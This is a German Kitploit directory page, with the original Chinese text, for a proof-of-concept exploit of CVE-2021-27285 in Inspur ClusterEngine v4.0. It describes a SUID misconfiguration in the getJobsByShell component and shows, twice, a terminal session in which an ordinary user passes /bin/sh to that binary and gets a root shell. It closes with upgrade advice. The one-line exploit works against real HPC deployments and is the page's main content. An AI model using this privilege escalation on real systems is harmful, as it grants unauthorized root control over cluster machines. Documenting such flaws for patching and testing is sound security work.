Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-27285 — Proof-of-Concept-Exploit für die Inspur ClusterEngine SUID-Fehlkonfiguration (CVE-2021-27285), die Nicht-Admin-Benutzern die Privilegieneskalation auf root über die getJobsByShell-Komponente ermöglicht. | Kitploit
Tools/GitHubGitHub/fjh1997/cve-2021-27285
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsRed TeamingBinary-Exploitation
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

Proof-of-Concept-Exploit für die Inspur ClusterEngine SUID-Fehlkonfiguration (CVE-2021-27285), die Nicht-Admin-Benutzern die Privilegieneskalation auf root über die getJobsByShell-Komponente ermöglicht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-27285

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。

浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。

提权过程如下:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

修复建议: 升级相关组件

Die Inspur ClusterEngine Cluster-Management-Plattform ist eine Job-Management-Software, die speziell für die Inspur TianSuo HPC-Produktreihe entwickelt wurde. Eine Fehlkonfiguration der SUID-Einstellungen in Inspur ClusterEngine ermöglicht es Nicht-Administrator-Benutzern, Privilegien zu erweitern und über bestimmte Komponenten Root-Zugriff zu erhalten.

Inspur ClusterEngine v4.0 weist eine fehlerhafte SUID-Konfiguration bei der Komponente "/opt/tsce4/torque6/bin/getJobsByShell" auf, die es Nicht-Administrator-Benutzern erlaubt, über den SUID-Mechanismus Privilegien zu erweitern und Root-Zugriff zu erlangen.

Der Privilegieneskalationsprozess ist wie folgt:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

Hinweis: Aktualisieren Sie die entsprechenden Komponenten.

Tool herunterladen